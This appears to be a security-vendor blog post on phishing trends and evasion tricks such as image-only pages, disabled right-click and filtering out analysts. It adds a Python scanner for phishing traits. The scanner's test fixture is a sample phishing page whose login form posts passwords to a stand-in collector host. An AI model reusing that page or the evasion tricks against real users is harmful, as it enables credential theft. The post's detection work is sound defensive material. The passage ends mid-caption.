Phishing is an attempt to steal personally identifiable information, such as Social Security numbers, credit card details, date of birth, and other sensitive data. Typically, phishing targets a user with an email containing a link to a website that imitates a legitimate website the user might visit. As users have become savvier about their online practices, the developers of phishing sites have upped their game, too: many of the sites we see are carefully designed to look like the sites they're imitating, and clever tactics are used to trick potential victims.
In this blog, we will share some insights from phishing activities blocked across the Zscaler cloud. We'll cover the top brands and categories we are seeing targeted by phishing campaigns, recent examples of campaigns, and some of the tactics being used by threat actors to be more successful.

Types of phishing
There are different types of phishing activity, including:

Spear phishing, in which the phishing attempt is targeted against certain organizations or individuals working for specific companies.

SMiShing, also known as SMS phishing, which involves a message (SMS communication) that targets victims and entices them to click on URLs hosting phishing websites.

Whaling, in which threat actors target high-profile individuals, such as senior executives in a company, most often to gain internal company information that is not public knowledge.

What brands are being targeted?
While it might be easier to spoof the sites of lesser-known brands, where differences wouldn't be so apparent, the actors trying to steal personal information need to impersonate popular sites for maximum return, raising the odds of snaring a victim. Their phishing sites often feature the biggest brands, and they use a variety of tricks to evade detection, which we'll describe in this report. Some of the most commonly targeted brands we've seen in the recent phishing campaigns can be seen below:

Fig. 1: Top phished brands in the Zscaler Cloud
Microsoft tops the list partly because of Microsoft's multiple enterprise web properties, such as OneDrive, Office 365, and Outlook Web Access, among others, being targeted by the threat actors. Microsoft was followed by Facebook and PayPal in the list. In addition to the known brands, it was interesting to see phishing campaigns targeting Travel Visa portals (Canadian Visa and Australian Visa, for example) included in our top five most targeted brands. The attackers in this case were most likely interested in phishing for sensitive immigration information, such as passport details, date of birth, and national identification numbers.

The top five most commonly targeted application categories we saw in the recent phishing campaigns include:

Fig. 2: Top phished site categories in the Zscaler Cloud

Delivery of phishing content
The majority of the phishing campaigns start with an email or message containing a link to a site hosting the phishing page. If the user clicks on the link, the phishing page is delivered. We have seen an increasing number of phishing attempts being delivered over an encrypted channel (HTTPS). We believe this increase is most likely due to the availability of domain validated (DV) SSL certificates. These certificates are easy to obtain from free SSL cert providers like Let's Encrypt as well as from commercial Certificate Authorities. Multiple commercial CAs also offer free DV SSL certs with shorter validity periods, with the expectation that the client will purchase a paid certificate once those expire. However, these offers provide a safe haven for cybercriminals, who often leverage these short-term certs to deliver malicious content and then discard them.

About 65 percent of all phishing content we've seen in the past three months was over HTTP and the remaining 35 percent was over HTTPS. This represents a 300 percent increase in phishing content being delivered over HTTPS since 2016.

A look at recent phishing examples: Chalbhai campaign
We continue to see a known phishing campaign using the tag chalbhai in its form statements. This campaign has been targeting users with phishing pages that mimic American Express, Microsoft Office, and Adobe; seasonal campaigns like fake IRS and TurboTax webpages during tax season; and, more recently, holiday shopping season pages. A sample of this tag being used on a Wells Fargo phishing page is shown below.

Fig. 3: Chalbhai tag shown in the source code

Usage of compromised sites
Below is an example of a legitimate site that has been compromised, on which the attacker has hosted multiple phishing sites under the compromised domain. The screenshot shows the open directory found on the compromised webserver.

Fig. 4: Compromised webserver
The two screenshots that follow are phishing pages designed to look like pages of legitimate websites, including a single sign-on page for Abilene Christian University and a Bank of America page.

Fig. 5: Faked SSO for Abilene Christian University

Fig. 6: Faked Bank of America page
If the user falls for these phishing pages, the credentials are harvested and posted to the attacker-controlled location.

Evasion and Anti-Analysis Techniques

1. Use of images instead of content

The phishing websites are usually cloned copies of the legitimate sites. The difference in the case of Bank of America is that the faked page is almost entirely made up of a single image with a simple credential login form. This helps to evade engines running heuristics on the page source code.

2. Preventing access to page source

A simple anti-analysis technique used by scammers is disabling the right-click functionality to prevent users from checking the page source. This can be seen in the phishing page below, which is pretending to be an Adobe Online document.

Fig. 7: Malicious Adobe Online document

3. Filtering based on User IP address, Host Names, and User Agent strings involved in the request
We've also observed malicious actors trying to fingerprint visitors and serve phishing content based on the user's IP address, host name, and User-Agent. We can see an example in the snippet below, where the attacker is maintaining a list of IP addresses, hostnames, and User-Agent strings known to be used by security researchers and analysts when they attempt to retrieve the phishing page. If any request to the phishing site arrives from one of the known IP addresses or hostnames, or carries one of the listed User-Agent strings, the phishing page will not be served. This tactic helps the attacker keep the phishing page content undetected for a longer duration.
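The three evasion techniques above, together with the chalbhai form tag and the off-site credential posting described earlier, are all visible in a retrieved page's HTML, which makes them usable as detection heuristics. The following scanner is an added example written for this post; it is not Zscaler's code or anything taken from the campaigns described. It parses a page with Python's standard-library HTMLParser and reports: a password form whose action posts to a host other than the page's own, a login form on a near-textless page built from images, right-click disabled via an oncontextmenu attribute or script, and the chalbhai marker anywhere in the markup. The 200-character visible-text threshold is an assumption, and both sample pages are constructed for the test rather than captured from a real site.

```python
"""Heuristic scan of a retrieved HTML page for phishing-page traits (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

CAMPAIGN_MARKERS = ("chalbhai",)  # tag the blog reports in the campaign's form statements
MIN_VISIBLE_TEXT = 200            # assumed: fewer visible chars + image + login form = "image page"


class PageFeatures(HTMLParser):
    """Collects the page features the heuristics in analyze() look at."""

    def __init__(self):
        super().__init__()
        self.forms = []               # one dict per <form>: action, has_password
        self.image_count = 0
        self.visible_text = 0         # characters outside <script>/<style>
        self.script_text = []         # inline script bodies, for the right-click check
        self.right_click_blocked = False
        self.markers = []             # (where, marker) for campaign markers found
        self._form = None
        self._in_raw = False          # inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)           # HTMLParser lowercases attribute names
        if tag == "form":
            self._form = {"action": attrs.get("action") or "", "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._form["has_password"] = True
        elif tag == "img":
            self.image_count += 1
        elif tag in ("script", "style"):
            self._in_raw = True
        if "oncontextmenu" in attrs:  # e.g. <body oncontextmenu="return false">
            self.right_click_blocked = True
        for name, value in attrs.items():
            self._check_marker(f"{tag}[{name}]", value or "")

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag in ("script", "style"):
            self._in_raw = False

    def handle_data(self, data):
        if self._in_raw:
            self.script_text.append(data)
            self._check_marker("script", data)
        else:
            self.visible_text += len(data.strip())
            self._check_marker("text", data)

    def _check_marker(self, where, value):
        low = value.lower()
        for marker in CAMPAIGN_MARKERS:
            if marker in low:
                self.markers.append((where, marker))


def analyze(html, page_url):
    """Return a list of (kind, detail) findings for the page served at page_url."""
    feats = PageFeatures()
    feats.feed(html)
    feats.close()
    page_host = urlparse(page_url).hostname or ""
    findings = []
    login_forms = [f for f in feats.forms if f["has_password"]]
    for form in login_forms:
        action_host = urlparse(form["action"]).hostname  # None for relative actions
        if action_host and action_host != page_host:
            findings.append(("offsite_post", action_host))
    if login_forms and feats.image_count and feats.visible_text < MIN_VISIBLE_TEXT:
        findings.append(("image_login", f"{feats.visible_text} visible chars, {feats.image_count} images"))
    script = "\n".join(feats.script_text)
    if feats.right_click_blocked or re.search(r"oncontextmenu|['\"]contextmenu['\"]", script):
        findings.append(("no_right_click", "page source hidden from casual inspection"))
    for where, marker in feats.markers:
        findings.append(("campaign_marker", where))
    return findings


# Constructed sample pages for demonstration; not captured from any real site.
SAMPLE_PHISH = """<html><head><title>Sign in</title>
<script>document.oncontextmenu = function () { return false; };</script>
</head><body oncontextmenu="return false">
<img src="background.png">
<form name="chalbhai" action="https://collector.example/post.php" method="post">
<input type="text" name="user"><input type="password" name="pass">
<input type="submit" value="Sign In"></form>
</body></html>"""

SAMPLE_BENIGN = """<html><body><h1>Welcome</h1><p>Please sign in with your account.</p>
<form action="/login" method="post"><input type="password" name="pw"></form></body></html>"""

if __name__ == "__main__":
    for kind, detail in analyze(SAMPLE_PHISH, "https://bank-login.example/index.html"):
        print(f"{kind}: {detail}")
```

The scanner only sees whatever HTML the fetcher actually received, so it has to be paired with a retrieval step that reflects what a victim's browser would get; a page that fingerprints analyst infrastructure, as in the snippet the post describes, may hand a crawler a harmless page instead. Findings are indicators to raise a page's score in a detection pipeline, not verdicts on their own: a legitimate site can post a login form to a separate auth host, and image-heavy landing pages exist.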
Fig. 8: Banned source IP addresses, hostnames and User-